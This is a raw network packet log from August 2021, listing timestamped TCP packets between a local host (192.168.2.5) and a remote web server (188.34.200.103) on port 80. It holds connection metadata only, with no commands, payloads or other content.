Aug 24, 2021 08:49:23.907236099 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.907294035 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.907305002 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.907305956 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.907321930 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.907336950 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.907337904 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.907355070 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.907371044 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.907371044 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.907392025 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.907397985 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.907409906 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.907424927 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.907428980 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.907444954 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.907447100 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.907461882 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.907468081 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.907478094 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.907493114 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.907495975 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.907507896 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.907521009 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.907522917 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.907532930 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.907545090 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.907557011 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.907571077 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.907582998 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.907643080 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.907665014 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.907685995 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.907699108 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.907715082 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.907731056 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.907747030 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.907762051 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.907778025 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.907793999 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.907812119 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.907830000 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.907846928 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.907864094 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.907881021 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.907897949 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.907913923 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.907929897 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.907934904 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.907951117 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.907953978 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.907954931 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.907957077 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.907962084 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.907978058 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.907983065 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.907988071 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.907990932 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.907994032 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.907994986 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.907996893 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.907999992 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.908001900 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.908004999 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.908010006 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.908029079 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.908051014 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.908061981 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.908077955 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.908085108 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.908094883 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.908104897 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.908112049 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.908128023 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.908144951 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.908150911 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.908160925 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.908178091 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.908185005 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.908215046 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.928554058 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.928585052 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.928599119 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.928611040 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.928627014 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.928639889 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.928652048 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.928668022 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.928684950 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.928705931 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.928716898 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.928724051 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.928740025 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.928755999 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.928771973 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.928786993 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.928802967 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.928807974 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.928817034 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.928818941 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.928838015 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.928838015 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.928854942 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.928870916 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.928872108 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.928888083 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.928908110 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.928924084 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.928931952 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.928946018 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.928951979 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.928972960 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.928987026 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.928993940 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.929014921 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.929034948 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.929052114 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.929055929 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.929069042 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.929078102 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.929080009 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.929100037 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.929106951 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.929116964 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.929132938 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.929148912 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.929155111 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.929163933 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.929178953 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.929179907 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.929193974 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.929205894 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.929214954 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.929225922 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.929236889 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.929260969 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.929267883 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.929284096 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.929302931 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.929303885 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.929320097 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.929327011 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.929335117 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.929351091 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.929367065 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.929369926 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.929385900 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.929404974 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.929405928 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.929429054 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.929436922 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.929451942 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.929471970 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.929487944 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.929503918 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.929507971 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.929526091 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.929538965 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.929547071 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.929564953 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.929569006 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.929584026 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.929589987 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.929608107 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.929630995 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.929632902 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.929652929 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.929666042 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.929668903 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.929683924 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.929701090 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.929704905 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.929716110 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.929739952 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.929754972 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.929764986 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.929774046 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.929786921 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.929809093 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.929811001 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.929830074 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.929846048 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.929847956 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.929873943 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.929876089 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.929893017 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.929908991 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.929913044 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.929936886 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.929950953 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.929960966 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.929984093 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.929987907 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.930005074 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.930015087 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.930028915 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.930048943 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.930051088 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.930073023 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.930094957 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.930098057 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.930114985 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.930119991 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.930140972 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.930156946 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.930166006 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.930185080 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.930188894 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.930210114 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.930212975 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.930232048 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.930252075 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.930253029 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.930278063 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.930289984 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.930301905 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.930322886 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.930324078 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.930346012 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.930361032 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.930367947 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.930385113 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.930389881 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.930408955 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.930423021 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.930423975 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.930444002 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.930460930 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.930468082 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.930476904 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.930500031 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.930506945 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.930522919 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.930533886 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.930542946 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.930558920 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.930571079 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.930576086 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.930594921 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.930612087 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.930613041 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.930629969 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.930643082 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.930649042 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.930669069 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.930671930 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.930697918 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.930710077 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.930717945 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.930742025 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.930747032 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.930767059 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.930790901 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.930789948 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.930809021 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.930819035 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.930825949 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.930844069 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.930856943 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.930866957 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.930890083 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.930895090 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.930910110 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.930922031 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.930938005 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.930955887 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.930958986 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.930973053 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.930991888 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.931001902 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.931009054 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.931025028 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.931026936 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.931041002 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.931061029 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.931067944 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.931091070 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.931107998 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.931157112 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.931164026 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.931169033 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.931174994 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.931189060 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.931211948 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.931236029 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.931236982 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.931257963 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.931272984 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.931282997 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.931301117 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.931317091 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.931319952 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.931337118 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.931339979 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.931353092 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.931371927 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.931379080 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.931394100 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.931402922 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.931411028 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.931427956 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.931438923 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.931444883 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.931467056 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.931488037 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.931497097 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.931509018 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.931516886 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.931529999 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.931551933 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.931560040 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.931570053 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.931586981 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.931595087 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.931602955 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.931622028 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.931622982 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.931641102 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.931644917 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.931658030 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.931674957 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.931693077 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.931749105 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.940335035 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.942388058 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.954070091 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.954118013 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.954147100 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.954188108 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.954250097 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.954298019 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.961369038 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.961467028 CEST	80	49718	188.34.200.103	192.168.2.5
